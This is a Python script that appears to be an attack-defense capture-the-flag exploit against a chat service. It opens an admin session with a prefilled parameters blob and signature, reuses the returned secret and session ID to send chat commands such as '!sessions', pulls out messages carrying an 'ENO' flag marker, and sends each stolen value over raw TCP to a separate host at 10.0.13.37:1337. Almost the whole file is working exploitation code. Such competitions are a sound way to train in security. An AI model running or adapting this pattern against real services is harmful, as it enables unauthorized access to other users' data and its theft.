import requests
import json
import socket
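def netcat(hostname, port, content):
    """Send *content* to ``hostname:port`` over TCP and print every reply chunk.

    Args:
        hostname: Host to connect to.
        port: TCP port number.
        content: Bytes to transmit. The write side is shut down once they
            are sent, so the peer sees EOF and can answer.

    The socket is always released: the ``with`` block closes it even when
    connect(), sendall() or recv() raises, where the original leaked the
    descriptor.
    """
    with socket.create_connection((hostname, port)) as conn:
        conn.sendall(content)
        # Half-close: no more data from us, but keep reading the peer's answer.
        conn.shutdown(socket.SHUT_WR)
        while True:
            chunk = conn.recv(1024)
            # recv() returns b"" only at EOF. Test the raw bytes instead of
            # decoding: decode() on a 1024-byte chunk that splits a multi-byte
            # character, or on any non-UTF-8 reply, raised UnicodeDecodeError
            # and aborted the read loop.
            if not chunk:
                break
            print("Received:", repr(chunk))
    print("Connection closed.")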
# allows us to store cookies that we receive and send
session = requests.Session()

# Open a chat session through the admin endpoint. The query string carries a
# JSON "parameters" blob and a "signature" value; both are sent verbatim.
r1 = session.post('http://10.1.16.1:8011/admin/session/begin?parameters=%7B%22state%22%3A+%22chat%5C%5Cgreeting%5C%5CGreetingState%22%2C+%22extras%22%3A+%22joke%2Cphysical-sick%2Csevere-physical-sick%2Ceve%2Cambulance%2Cphysical-sick%2Csick%2Cmorning-chat%22%2C+%22language%22%3A+%22en%22%2C+%22timezone%22%3A+%22America%2FManagua%22%7D&signature=N3mzOPWaWsK%2FM67krE3i%2FSlObX66MgDtZazd4Cm6u75BDmQlelqwZO29j1qT5Fxru3acMvQSfacIXBZtr8OTnBTQ22iJrRrVeTSZcGL41iRCycAYOvigckW6Uz%2BhZfJhCIT2scWXnMf1PAloaXRUI%2Blz%2B3cgd1lFM7Vz6XDYSgIZNheGRH190ECxPX9TLlq7XH8J%2FXqUOr1Vw0TbPZNhFrDfQJ7YzohHCLyV8NvDIE1luhK2RGs8EzT4iIovd69roV8p%2FqE96NfKUlXLuLaCGQ8ycyEAd9ynHorSEmxenfFhE19vtNg%2FV1MQe37bdp7hGvS%2ByZtDqGJS90suY68licVMg4lzWM7NTq3O8C1dj%2FvFhwTu3xkrFWgYVXHn2vvqd15aJTYNdKaeI%2BCE1Nr92FDVeQtGq5NykIgupa738M5Q1i3dtrzVj%2FnaeyqwdldWeBlM%2Btzw4A3%2Fgm2mTLN7UyutUwXLBJc4nWswYH4zo6zlKi5dDECOrNb1Lk6FmnByxXx9kxdMZztRl9z6RQAp9WF70ofRWkXp8un%2BCZZ7E3WjallMJ%2BObDVC0XjLMjRLCmJCOnTQkIirowf1eYKmHbN1rf4l2qVn80bJfTNNTPsBqnssO%2Finzcu4XpkwkpIk37WdctWZF2ITm%2B2aXUCQlSdQWOTTAE0JD3XnrBCk%2B5bM%3D')

# parses response
response = json.loads(r1.text)
#print(r1.text)
#print(session.cookies.get_dict())

# The begin response hands back the credentials every later request reuses.
# NOTE(review): they are resent in the query string over plain HTTP, so they
# end up in server, proxy and browser logs.
secret = response["secret"]
sessionID = response["session"]
profileID = response["profile_id"]
#print(secret, sessionID, profileID)


def _chat_url(encoded_message):
    """Return the /chat URL for one already-percent-encoded message."""
    return ('http://10.1.16.1:8011/chat?session=' + sessionID
            + '&secret=' + secret + '&message=' + encoded_message)


# first message
r2 = session.get('http://10.1.16.1:8011/chat/messages?session=' + sessionID + '&secret=' + secret + '&message=%21sessions')
# second message
r3 = session.post(_chat_url('The+weather+is+nice+today%2C+isn%27t+it%3F+%F0%9F%97%9C'))
# third message
r4 = session.post(_chat_url('tell+me+a+joke'))
# fourth message
r5 = session.post(_chat_url('01101000+01100101+01101100+01101100+01101111+%F0%9F%A4%96'))
# last message
r6 = session.post(_chat_url('%21sessions'))
#print(r6.text)

# Keep the messages that contain the "ENO" marker, then strip everything up
# to and including the first "-" plus one more character. flag.index raises
# ValueError if a kept message has no "-".
messages = json.loads(r6.text)["messages"]
flags = [message for message in messages if "ENO" in message]
finalFlags = [flag[flag.index("-") + 2:] for flag in flags]
print(finalFlags)

# Hand each extracted value to the TCP helper netcat(), one connection per value.
for flag in finalFlags:
    netcat("10.0.13.37", 1337, str.encode(flag))